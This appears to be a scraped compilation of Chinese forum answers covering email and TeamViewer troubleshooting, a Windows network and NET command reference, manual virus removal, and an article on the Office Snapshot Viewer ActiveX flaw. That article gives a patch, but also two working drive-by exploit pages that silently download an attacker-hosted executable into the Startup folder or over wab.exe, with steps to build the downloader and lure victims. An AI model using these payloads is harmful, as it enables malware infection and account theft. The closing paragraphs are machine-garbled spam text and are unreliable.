首先要确认对方有没有成功发送,还有是否是打错你邮箱地址?还有LZ检查一下你们的邮箱是不是满了,删除一些,不然是收不到邮件的。 以下是别人的意见,我复制给你参考: 如果没有收到邮件,请检查电子邮箱是否有问题。测试方法:首先用出问题的同样的帐号给自己发一封邮件,如果发信正常并且能够收到邮件,说明一切正常,没有问题。否则,请按以下方法检测: 1、检查是否关闭了数字帐号。打开“邮箱设置”,点击“帐户”,检查是设置了“关闭数字帐号”; 2、检查邮件过滤设置。打开“邮箱设置”,点击“过滤器”,检查过滤条件是否设置不当; 3、检查反垃圾设置。打开“邮箱设置”,点击“反垃圾”,接着点击“黑名单设置”,若发现黑名单中误加入了正常的邮箱地址,从黑名单中删除以后就可以收到对方的来信了; 4、检查反垃圾选项设置。打开“邮箱设置”,点击“反垃圾”,检查“反垃圾选项”,看看是否设置了严格反垃圾而导致邮件系统拒绝接收不符合该级别条件的正常邮件; 5、如果以上测试都正常,则可能由线路、邮件服务器故障等原因造成用户无法收到邮件,可以和发件人联系一下,看看对方是否有收到退信信息,可以根据退信信息判断问题所在,或者与客服中心联系
TeamViewer连接时,首先发起端连接TeamViewer的服务器,查到被控端的路由,然后发起端与被控端握手,握手成功,那么你就可以控制。常理是这样,具体TeamViewer的技术详情那可能更复杂了。但是有一点,就是这其中如果一个环节连接不正常,就无法正常远程控制。比如对方恰好在你连接的时候,网络中断了?或者杀毒软件禁止?另外TeamViewer的版本不同也可能会影响正常建立连接。通常被控端启动TeamViewer时,如果有杀毒软件提示时完全放行,网络是正常的,这种情况则很少出现。往往出现时,重新启动TeamViewer再次连接问题即可解决。
DOS 命令大全
Arp
显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表。该命令只有在安装了 TCP/IP 协议之后才可用。
arp -a [inet_addr] [-N [if_addr]
arp -d inet_addr [if_addr]
arp -s inet_addr ether_addr [if_addr]
参数
-a
通过询问 TCP/IP 显示当前 ARP 项。如果指定了 inet_addr,则只显示指定计算机的 IP 和物理地址。
-g
与 -a 相同。
inet_addr
以加点的十进制标记指定 IP 地址。
-N
显示由 if_addr 指定的网络界面 ARP 项。
if_addr
指定需要修改其地址转换表接口的 IP 地址(如果有的话)。如果不存在,将使用第一个可适用的接口。
-d
删除由 inet_addr 指定的项。
-s
在 ARP 缓存中添加项,将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的6 个十六进制字节给定。使用带点的十进制标记指定 IP 地址。项是永久性的,即在超时到期后项自动从缓存删除。
ether_addr
指定物理地址。
Finger
在运行 Finger 服务的指定系统上显示有关用户的信息。根据远程系统输出不同的变量。该命令只有在安装了 TCP/IP 协议之后才可用。
finger [-l] [user]@computer[...]
参数
-l
以长列表格式显示信息。
user
指定要获得相关信息的用户。省略用户参数以显示指定计算机上所有用户的信息:
@computer
Ftp
将文件传送到正在运行 FTP 服务的远程计算机或从正在运行 FTP 服务的远程计算机传送文件(有时称作 daemon)。Ftp可以交互使用。单击“相关主题”列表中的“ftp 命令”以获得可用的“ftp”子命令描述。该命令只有在安装了 TCP/IP 协议之后才可用。Ftp 是一种服务,一旦启动,将创建在其中可以使用ftp 命令的子环境,通过键入 quit 子命令可以从子环境返回到 Windows 2000 命令提示符。当 ftp 子环境运行时,它由 ftp 命令提示符代表。
ftp [-v] [-n] [-i] [-d] [-g] [-s:filename] [-a] [-w:windowsize] [computer]
参数
-v
禁止显示远程服务器响应。
-n
禁止自动登录到初始连接。
-i
多个文件传送时关闭交互提示。
-d
启用调试、显示在客户端和服务器之间传递的所有 ftp 命令。
-g
禁用文件名组,它允许在本地文件和路径名中使用通配符字符(* 和 ?)。(请参阅联机“命令参考”中的 glob 命令。)
-s: filename
指定包含 ftp 命令的文本文件;当 ftp 启动后,这些命令将自动运行。该参数中不允许有空格。使用该开关而不是重定向( )。
-a
在捆绑数据连接时使用任何本地接口。
-w:windowsize
替代默认大小为 4096 的传送缓冲区。
computer
指定要连接到远程计算机的计算机名或 IP 地址。如果指定,计算机必须是行的最后一个参数。
Nbtstat
该诊断命令使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。该命令只有在安装了TCP/IP 协议之后才可用。
nbtstat [-a remotename] [-A IP address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]
参数
-a remotename
使用远程计算机的名称列出其名称表。
-A IP address
使用远程计算机的 IP 地址并列出名称表。
-c
给定每个名称的 IP 地址并列出 NetBIOS 名称缓存的内容。
-n
列出本地 NetBIOS 名称。“已注册”表明该名称已被广播 (Bnode) 或者 WINS(其他节点类型)注册。
-R
清除 NetBIOS 名称缓存中的所有名称后,重新装入 Lmhosts 文件。
-r
列出 Windows 网络名称解析的名称解析统计。在配置使用 WINS 的 Windows 2000 计算机上,此选项返回要通过广播或WINS 来解析和注册的名称数。
-S
显示客户端和服务器会话,只通过 IP 地址列出远程计算机。
-s
显示客户端和服务器会话。尝试将远程计算机 IP 地址转换成使用主机文件的名称。
interval
重新显示选中的统计,在每个显示之间暂停 interval 秒。按 CTRL+C 停止重新显示统计信息。如果省略该参数,nbtstat 打印一次当前的配置信息。
Netstat
显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP 协议后才可以使用。
netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval]
参数
-a
显示所有连接和侦听端口。服务器连接通常不显示。
-e
显示以太网统计。该参数可以与 -s 选项结合使用。
-n
以数字格式显示地址和端口号(而不是尝试查找名称)。
-s
显示每个协议的统计。默认情况下,显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集。
-p protocol
显示由 protocol 指定的协议的连接;protocol 可以是 tcp 或 udp。如果与 -s 选项一同使用显示每个协议的统计,protocol 可以是 tcp、udp、icmp 或 ip。
-r
显示路由表的内容。
interval
重新显示所选的统计,在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新显示统计。如果省略该参数,netstat 将打印一次当前的配置信息。
Ping
验证与远程计算机的连接。该命令只有在安装了 TCP/IP 协议后才可以使用。
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [-j computer-list] | [-k computer-list] [-w timeout] destination-list
参数
-t
Ping 指定的计算机直到中断。
-a
将地址解析为计算机名。
-n count
发送 count 指定的 ECHO 数据包数。默认值为 4。
-l length
发送包含由 length 指定的数据量的 ECHO 数据包。默认为 32 字节;最大值是 65,527。
-f
在数据包中发送“不要分段”标志。数据包就不会被路由上的网关分段。
-i ttl
将“生存时间”字段设置为 ttl 指定的值。
-v tos
将“服务类型”字段设置为 tos 指定的值。
-r count
在“记录路由”字段中记录传出和返回数据包的路由。count 可以指定最少 1 台,最多 9 台计算机。
-s count
指定 count 指定的跃点数的时间戳。
-j computer-list
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为9。
-k computer-list
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为9。
-w timeout
指定超时间隔,单位为毫秒。
destination-list
指定要 ping 的远程计算机。
Rcp
在 Windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件。rcp 命令是一个连接命令,从Windows 2000 计算机发出该命令时,也可以用于其他传输在两台运行 rshd 的计算机之间复制文件。rshd 端口监控程序可以在 UNIX 计算机上使用,而在Windows 2000 上不能使用,所以 Windows 2000 计算机仅可以作为发出命令的系统参与。远程计算机必须也通过运行 rshd 提供 rcp 实用程序。
rcp [-a | -b] [-h] [-r] source1 source2 ... sourceN destination
参数
-a
指定 ASCII 传输模式。此模式在传出文件上将回车/换行符转换为回车符,在传入文件中将换行符转换为回车/换行符。该模式为默认的传输模式。
-b
指定二进制图像传输模式。没有执行回车/换行符转换。
-h
传输 Windows 2000 计算机上标记为隐藏属性的源文件。如果没有该选项,在 rcp 命令行上指定隐藏文件的效果与文件不存在一样。
-r
将源的所有子目录内容递归复制到目标。source 和 destination 都必须是目录,虽然即使源不是目录,使用-r 也能够工作。但将没有递归。
source 和 destination
格式必须为 [computer[.user]:]filename。如果忽略了 [computer[.user]:] 部分,计算机将假定为本地计算机。如果省略了 [.user] 部分,将使用当前登录的 Windows 2000 用户名。如果使用了完全合格的计算机名,其中包含句点(.) 分隔符,则必须包含 [.user]。否则,计算机名的最后部分将解释为用户名。如果指定了多个源文件,则destination 必须是目录。
如果文件名不是以 UNIX 的正斜杠 (/) 或 Windows 2000 系统的反斜杠 (\) 打头,则假定相对于当前的工作目录。在Windows 2000 中,这是发出命令的目录。在远程系统中,这是远程用户的登录目录。句点 (.) 表示当前的目录。在远程路径中使用转义字符(\、" 或 '),以便在远程计算机中使用通配符。
Rexec
在运行 REXEC 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了TCP/IP 协议后才可以使用该命令。
rexec computer [-l username] [-n] command
参数
computer
指定要运行 command 的远程计算机。
-l username
指定远程计算机上的用户名。
-n
将 rexec 的输入重定向到 NULL。
command
指定要运行的命令。
Route
控制网络路由表。该命令只有在安装了 TCP/IP 协议后才可以使用。
route [-f] [-p] [command [destination] [mask subnetmask] [gateway] [metric costmetric]
参数
-f
清除所有网关入口的路由表。如果该参数与某个命令组合使用,路由表将在运行命令前清除。
-p
该参数与 add 命令一起使用时,将使路由在系统引导程序之间持久存在。默认情况下,系统重新启动时不保留路由。与 print 命令一起使用时,显示已注册的持久路由列表。忽略其他所有总是影响相应持久路由的命令。
command
指定下列的一个命令。
命令 目的
print 打印路由
add 添加路由
delete 删除路由
change 更改现存路由
destination
指定发送 command 的计算机。
mask subnetmask
指定与该路由条目关联的子网掩码。如果没有指定,将使用 255.255.255.255。
gateway
指定网关。
名为 Networks 的网络数据库文件和名为 Hosts 的计算机名数据库文件中均引用全部 destination 或 gateway 使用的符号名称。如果命令是 print 或 delete,目标和网关还可以使用通配符,也可以省略网关参数。
metric costmetric
指派整数跃点数(从 1 到 9999)在计算最快速、最可靠和(或)最便宜的路由时使用。
Rsh
在运行 RSH 服务的远程计算机上运行命令。该命令只有在安装了 TCP/IP 协议后才可以使用。
rsh computer [-l username] [-n] command
参数
computer
指定运行 command 的远程计算机。
-l username
指定远程计算机上使用的用户名。如果省略,则使用登录的用户名。
-n
将 rsh 的输入重定向到 NULL。
command
指定要运行的命令。
Tftp
将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件。该命令只有在安装了TCP/IP 协议后才可以使用。
tftp [-i] computer [get | put] source [destination]
参数
-i
指定二进制图像传送模式(也称为“八位字节”)。在二进制图像模式中,文件一个字节接一个字节地逐字移动。在传送二进制文件时使用该模式。
如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。此模式将 EOL 字符转换为 UNIX 的回车符和个人计算机的回车符/换行符。在传送文本文件时应使用此模式。如果文件传送成功,将显示数据传输率。
computer
指定本地或远程计算机。
put
将本地计算机上的文件 destination 传送到远程计算机上的文件 source。
get
将远程计算机上的文件 destination 传送到本地计算机上的文件 source。
如果将本地计算机上的文件 file-two 传送到远程计算机上的文件 file-one,请指定 put。如果将远程计算机上的文件file-two 传送到远程计算机上的文件 file-one,请指定 get。
因为 tftp 协议不支持用户身份验证,所以用户必须登录,并且文件在远程计算机上必须可以写入。
source
指定要传送的文件。如果本地文件指定为 -,则远程文件在 stdout 上打印出来(如果获取),或从 stdin(如果放置)读取。
destination
指定将文件传送到的位置。如果省略了 destination,将假定与 source 同名。
Tracert
该诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标采用的路由。要在转发数据包上的TTL 之前至少递减 1,必需路径上的每个路由器,所以 TTL 是有效的跃点计数。数据包上的 TTL 到达 0 时,路由器应该将“ICMP 已超时”的消息发送回源系统。Tracert 先发送 TTL 为 1 的回显数据包,并在随后的每次发送过程将 TTL 递增 1,直到目标响应或 TTL 达到最大值,从而确定路由。路由通过检查中级路由器发送回的“ICMP 已超时”的消息来确定路由。不过,有些路由器悄悄地下传包含过期 TTL 值的数据包,而 tracert 看不到。
tracert [-d] [-h maximum_hops] [-j computer-list] [-w timeout]target_name
参数
/d
指定不将地址解析为计算机名。
-h maximum_hops
指定搜索目标的最大跃点数。
-j computer-list
指定沿 computer-list 的稀疏源路由。
-w timeout
每次应答等待 timeout 指定的微秒数。
target_name
目标计算机的名称。 NET命令的基本用法
Net
以下综合了WINDOWS 98,WINDOWS WORKSTATION和WINDOWS SERVER 三个操作系统关于NET命令的解释,希望可以更全面一些。
先说一些:
(1)NET命令是一个命令行命令。
(2)管理网络环境、服务、用户、登陆。。。。等本地信息
(3)WIN 98,WIN WORKSTATION和WIN NT都内置了NET命令。
(4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。
(5)WORKSTATION和SERVER中的NET命令基本相同。
(6)获得HELP
(1)在NT下可以用图形的方式,开始-》帮助-》索引-》输入NET
(2)在COMMAND下可以用字符方式,NET /?或NET或NET HELP得到一些方法 相应的方法的帮助NETCOMMAND /HELP或NET HELP COMMAND 或NET COMMAND /? 另对于错误NET HELPMSG MESSAGE#是4位数
(7)强制参数 所有net命令接受选项/yes和/no(可缩写为/y和/n)。[简单的说就是预先给系统的 提问一个答案]
(8)有一些命令是马上产生作用并永久保存的,使用的时候要慎重
(9)对于NET命令的功能都可以找到相应的图形工具的解决方案
(10)命令的组成 命令 参数 选项 | 参数 选项 | 参数 选项 |。。。。。。 罗里罗嗦说了一大堆,其实就是6和7有用,呵呵。另有两件事:
(1)在NT的NET命令中有一些参数是只有在SERVER环境中才能使用的
(2)在WIN98的NET命令中有一些参数不能在DOS-WIN中使用,只能在DOS环境中使用
下面对NET命令的不同参数的基本用法做一些初步的介绍:
一、NET VIEW
作 用:显示域列表、计算机列表或指定计算机的共享资源列表。
命令格式:net view [\\computername | /domain[:domainname]
参数介绍:
(1)键入不带参数的net view显示当前域的计算机列表。
(2)\\computername 指定要查看其共享资源的计算机。
(3)/domain[:domainname]指定要查看其可用计算机的域。
简单事例:
(1)net view \\YFANG查看YFANG的共享资源列表。
(2)net view /domain:LOVE查看LOVE域中的机器列表。
二、NET USER
作 用:添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users。
命令格式:net user [username [password | *] [options] [/domain]
参数介绍:
(1)键入不带参数的net user查看计算机上的用户帐号列表。
(2)username添加、删除、更改或查看用户帐号名。
(3)password为用户帐号分配或更改密码。
(4)*提示输入密码。
(5)/domain在计算机主域的主域控制器中执行操作。
简单事例:
(1)net user yfang查看用户YFANG的信息
三、NET USE
作 用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。
命令格式:net use [devicename | *] [\\computername\sharename[\volume] [password | *] [/user:[domainname\]username] [/delete] | [/persistent:{yes | no]}
参数介绍:
键入不带参数的net use列出网络连接。
devicename指定要连接到的资源名称或要断开的设备名称。
\\computername\sharename服务器及共享资源的名称。
password访问共享资源的密码。
*提示键入密码。
/user指定进行连接的另外一个用户。
domainname指定另一个域。
username指定登录的用户名。
/home将用户连接到其宿主目录。
/delete取消指定网络连接。
/persistent控制永久网络连接的使用。
简单事例:
(1)net use e: \\YFANG\TEMP将\\YFANG\TEMP目录建立为E盘
(2)net use e: \\YFANG\TEMP /delete断开连接
四、NET TIME
作 用:使计算机的时钟与另一台计算机或域的时间同步。
命令格式:net time [\\computername | /domain[:name] [/set]
参数介绍:
(1)\\computername要检查或同步的服务器名。
(2)/domain[:name]指定要与其时间同步的域。
(3)/set使本计算机时钟与指定计算机或域的时钟同步。
下面的这4个参数是相关的,所以一起介绍
五、Net Start
作 用:启动服务,或显示已启动服务的列表。
命令格式:net start service
六、Net Pause
作 用:暂停正在运行的服务。
命令格式:net pause service
七、Net Continue
作 用:重新激活挂起的服务。
命令格式:net continue service
八、NET STOP
作 用:停止 Windows NT 网络服务。
命令格式:net stop service
参数介绍:我们来看看这些服务都是什么
(1)alerter(警报)
(2)client service for netware(Netware 客户端服务)
(3)clipbook server(剪贴簿服务器)
(4)computer browser(计算机浏览器)
(5)directory replicator(目录复制器)
(6)ftp publishing service (ftp )(ftp 发行服务)
(7)lpdsvc
(8)net logon(网络登录)
(9)network dde(网络 dde)
(10)network dde dsdm(网络 dde dsdm)
(11)network monitor agent(网络监控代理)
(12)nt lm security support provider(NT LM 安全性支持提供)
(13)ole(对象链接与嵌入)
(14)remote access connection manager(远程访问连接管理器)
(15)remote access isnsap service(远程访问 isnsap 服务)
(16)remote access server(远程访问服务器)
(17)remote procedure call (rpc) locator(远程过程调用定位器)
(18)remote procedure call (rpc) service(远程过程调用服务)
(19)schedule(调度)
(20)server(服务器)
(21)simple tcp/ip services(简单 TCP/IP 服务)
(22)snmp
(23)spooler(后台打印程序)
(24)tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)
(25)ups
(26)workstation(工作站)
(27)messenger(信使)
(28)dhcp client
(29)eventlog 以下这些SERVICE只能在NT SERVER上使用
(1)file server for macintosh
(2)gateway service for netware
(3)microsoft dhcp server
(4)print server for macintosh
(5)remoteboot
(6)windows internet name service
九、Net Statistics
作 用:显示本地工作站或服务器服务的统计记录。
命令格式:net statistics [workstation | server]
参数介绍:
(1)键入不带参数的net statistics列出其统计信息可用的运行服务。
(2)workstation显示本地工作站服务的统计信息。
(3)server显示本地服务器服务的统计信息。
简单事例:
(1)net statistics server | more显示服务器服务的统计信息
十、Net Share
作 用:创建、删除或显示共享资源。
命令格式:net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]
参数介绍:
(1)键入不带参数的net share显示本地计算机上所有共享资源的信息。
(2)sharename是共享资源的网络名称。
(3)drive:path指定共享目录的绝对路径。
(4)/users:number设置可同时访问共享资源的最大用户数。
(5)/unlimited不限制同时访问共享资源的用户数。
(6)/remark:"text "添加关于资源的注释,注释文字用引号引住。
简单事例:
(1)net share mylove=c:\temp /remark:"my first share"以mylove为共享名共享C:\temp
(2)net share mylove /delete停止共享mylove目录
十一、Net Session
作 用:列出或断开本地计算机和与之连接的客户端的会话,也可以写为net sessions或net sess。
命令格式:net session [\\computername] [/delete]
参数介绍:
(1)键入不带参数的net session显示所有与本地计算机的会话的信息。
(2)\\computername标识要列出或断开会话的计算机。
(3)/delete结束与\\computername计算机会话并关闭本次会话期间计算机的所有.
简单事例:
(1)net session \\YFANG要显示计算机名为YFANG的客户端会话信息列表。
十二、Net Send
作 用:向网络的其他用户、计算机或通信名发送消息。
命令格式:net send {name | * | /domain[:name] | /users} message
参数介绍:
(1)name要接收发送消息的用户名、计算机名或通信名。
(2)*将消息发送到组中所有名称。
(3)/domain[:name]将消息发送到计算机域中的所有名称。
(4)/users将消息发送到与服务器连接的所有用户。
(5)message作为消息发送的文本。
简单事例:
(1)net send /users server will shutdown in 5 minutes.给所有连接到服务器的用户发送消息
十三、Net Print
作 用:显示或控制打印作业及打印队列。
命令格式:net print [\\computername ] job# [/hold | /release | /delete]
参数介绍:
(1)computername共享打印机队列的计算机名。
(2)sharename打印队列名称。
(3)job#在打印机队列中分配给打印作业的标识号。
(4)/hold使用 job# 时,在打印机队列中使打印作业等待。
(5)/release释放保留的打印作业。
(6)/delete从打印机队列中删除打印作业。
简单事例:
(1)net print \\YFANG\SEEME列出\\YFANG计算机上SEEME打印机队列的目录
十四、Net Name
作 用:添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表。
命令格式:net name [name [/add | /delete]
参数介绍:
(1)键入不带参数的net name列出当前使用的名称。
(2)name指定接收消息的名称。
(3)/add将名称添加到计算机中。
(4)/delete从计算机中删除名称。
十五、Net Localgroup
作 用:添加、显示或更改本地组。
命令格式:net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]
参数介绍:
(1)键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。
(2)groupname要添加、扩充或删除的本地组名称。
(3)/comment: "text "为新建或现有组添加注释。
(4)/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作?
(5)name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名。
(6)/add将全局组名或用户名添加到本地组中。
(7)/delete从本地组中删除组名或用户名。
简单事例:
(1)net localgroup love /add将名为love的本地组添加到本地用户帐号数据库
(
朋友,你好:
也不安全,关键这个远程的人人品好,就没有问题,有问题,随便在远程时发一个木马程序,就可以盗取帐号,密码,淘宝等,还可通过电脑上的摄像头监控你,等等。
希望对你有所帮助,祝你快乐~
《马丁的早晨》是一部中法合拍片,于2004年2月17日在中央电视台全国首播。http://baike.baidu.com/view/583150.htm
《黑客狙击手》是中华人民共和国拍摄的。
http://baike.baidu.com/view/821908.htm
先用冰刃来结束该进程,然后去系统盘中搜索到xviewer.exe文件,进入带命令行的安全模式或直接进入DOS,然后用CD命令进入病毒文件所在的目录,如: c: 回车进入C盘 cd windows\system32 回车进入system32文件夹 )去除病毒文件的隐藏和只读属性(如果没有可略去),如病毒文件名为xviewer.exe,则: attrib -s -h xviewer.exe。删除病毒文件: del xviewer.exe。建立同名的文件夹,防止病毒文件再生: md xviewer.exe注意:要把后缀也带上 另外,有的目录在DOS中是禁止进行写操作的,如windows\system32\drivers。如果已将大部分病毒文件进行以上处理后,剩余的就可以到windows中进行操作了。 给同名文件夹加锁,避免病毒覆盖 attrib +s +h xviewer.exe。完成后重启进入Windows安全模式中全面查杀病毒 杀毒完成后就可以把那些自己建立的刚建立的文件夹删掉
一开始就错了, 自动开机只能做定时自动开机, 机器都没开怎么使用teamviewer能.
A无法给B开机,B电脑有密码也可以使用
设置无人值守 这样会teamviewer会自动启动了(前提是需要设置自动登录到桌面)
显示器不亮不影响,被控端已经登陆过桌面,teamviewer也启动连接上网络
被控端端 桌面壁纸会消失,右下角也有接入人的ID提示
有网页自己看也行..看我发的也行: http://www.chinaz.com/Program/Access/0Z93KC2008.html Access漏洞威胁的潜在人群十分巨大。目前已经有不少利用该漏洞的恶意网站了,一旦用户访问这些页面就会被植入木马下载器,这些木马下载器成功进入用户系统并执行后,就会下载其他的恶意程序木马,试图盗取用户的QQ、网游等账号,危险不言而喻。 本次Access漏洞除Office2007版本外,在以前的版本中广泛存在。由于用户在安装Office的时候很多都是选择的默认安装,附带也安装了Access,所以漏洞威胁的用户群数量非常的巨大。 HTTP GET功能导致漏洞出现 本次的Access漏洞的全名称为“Microsoft Office Snapshot Viewer ActiveX Exploit 漏洞”,是一个ActiveX控件漏洞。该漏洞存在于snapview.ocx控件中,出现的原因是因为该控件具有HTTP GET功能,这个功能可以从指定的网址下载指定的文件。 黑客要利用该漏洞,先要特制一个恶意网站引诱用户访问。当用户打开该网页的时候,恶意网址就赋给了HTTP GET功能,该功能被激活后就偷偷从恶意网址下载病毒,这样病毒就可以神不知鬼不觉地进入用户的系统中,威胁用户的各种账号和密码。受这个漏洞影响的Access版本有2003、2002、2000。 Access漏洞解决方案 方案1:现在已经有了该漏洞的补丁了,请大家赶快到 http://www.shudoo.com/bzsoft 下载。此外,我们还可以在“工具→Internet选项→安全”中,选择“Internet”图标,然后将下面的安全级别中设置为“高”(图3),这样可以有效地阻止网页木马入侵。 图3 方案2 :将以下内容复制在记事本中,另存为1.reg,然后双击导入注册表也可以堵上漏洞。 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}] “Compatibility Flags”=dword:00000400 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}] “Compatibility Flags”=dword:00000400 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}] “Compatibility Flags”=dword:00000400 目前黑客利用Access漏洞的主要方式 方式1:写入启动项 先申请一个免费的Web空间,用Mini downloader by SEC配置网页木马,在“URL”处输入网页木马地址,再点击“Creat”,又再弹出窗口中将文件保存为test.exe,这样就网页木马就配置好了。 接着将test.exe上传到先前申请的免费空间里面,病毒地址就是:http://(这里是申请的空间地址)/test.exe 。将以下漏洞的利用代码复制粘贴到新建的记事本里,另存为test.html。 html object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id='obj'/object script language='javascript' var buf1 = ‘http://(这里是申请的空间地址)/test.exe'; var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe'; obj.SnapshotPath = buf1; obj.CompressedPath = buf2; /script /html 最后将test.html上传到空间里,得到病毒的访问地址:http://(这里是空间地址)/test.html。做到这步,剩下的工作就是传播网址引诱用户访问了。当用户访问该网页时就会中招,用户的电脑会在启动项里出现test.exe文件。 点评: 这种方式有个缺点,就是有些安全软件会提示有程序写入启动项。 方式2:不写入启动项 将以下代码复制到新建的记事本中,另存为test.html上传到空间即可。当用户访问该网页时也会中招,不过启动项里没有test.exe文件,用户无法察觉自己中毒了。 html body script type="text/javascript" function killErrors() { return true; } window.onerror = killErrors; var x; var obj; var mycars = new Array(); mycars[0] = "C:/Program Files/Outlook Express/wab.exe"; mycars[1] = "d:/Program Files/Outlook Express/wab.exe"; var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1"); if(objlcx="[object]") { setTimeout('window.location = "[url=ldap://"]ldap://"',3000[/url]); for (x in mycars) { obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1") var buf1 = 'http://(这里是申请的空间地址)/test.exe'; var buf2=mycars[x]; obj.Zoom = 0; obj.ShowNavigationButtons = false; obj.AllowContextMenu = false; obj.SnapshotPath = buf1; try { obj.CompressedPath = buf2; obj.PrintSnapshot(); }catch(e){} } } /script /body /html 点评: 这种方式无需写入启动项,这样安全软件就不会有任何提示了,在用户访问恶意页面的时候直接中马,使用户中马的概率更高。
第 一页 剧情吧工夫 : 二0 一 三- 一0- 二 六 二 三: 四 五:0 八 已婚妻第 一散剧情先容 繁荣 都会 天天 车流穿越没有息,田飞的事情 便跟乡市的车流同样,天天 皆正在反复 运做,一地正午 他去到私司持续 事情 ,王司理 一个德律风 把他唤至办私室,待田飞走出去,王司理...
如许 当地 便依照 孬了一个tp 五的框架了。第两步:入进NGINX容器,经由过程 docker ps审查docker容器的container-id,运用docker exec敕令 入进到容器外部。 一 二 三 四 五 六 七 八ert@ertiaodeMac-mini ~/develop/en...
运用Nginx作Web办事 器进程 外,碰着 过如下几个答题:一、nginx封动掉 败 一systemctl start nginx.service封动nginx掉 败,报错疑息以下:Starting nginx: nginx: [emerg] bind() to 0.0.0.0:AV女优* fai...
第一步:确认网站谢封REWRITE规矩 正常有二种情形 :i.apache装置 的时刻 曾经包括 rewrite功效 ii.后绝设置装备摆设 的时刻 新加添mod_rewrite.so。那种情形 须要 正在httpd.conf文献外修正 设置装备摆设 封动正在conf目次 高httpd.conf外找...
信任 对于GOOGLE的沙盒(Sandbox)机造曾经有了比拟 深刻 的懂得 。由于 以前已经写过几篇闭于沙盒机造的文章。相闭的文章如: 一.Google的Sandbox沙盒效应 二.SEO,Google沙盒取升权对付 沙盒外一点儿比拟 底子 的器械 ,没有相识 的否以看下面的二篇文章。 以前,...
购置 网站应该注重战斟酌 哪些答题呢。上面尔具体 的说一高。取年夜 野分享一高履历 。有有余的地方请列位 同伙 弥补 。 毫无信答, 二00 七年正在站少的生涯 外鸣的至多的词之一便是SEO。以是 购网站的时刻 。那圆里的答题必然 要起首 斟酌 。估量 谁也没有会购个出有支录或者者被K过的域名,除...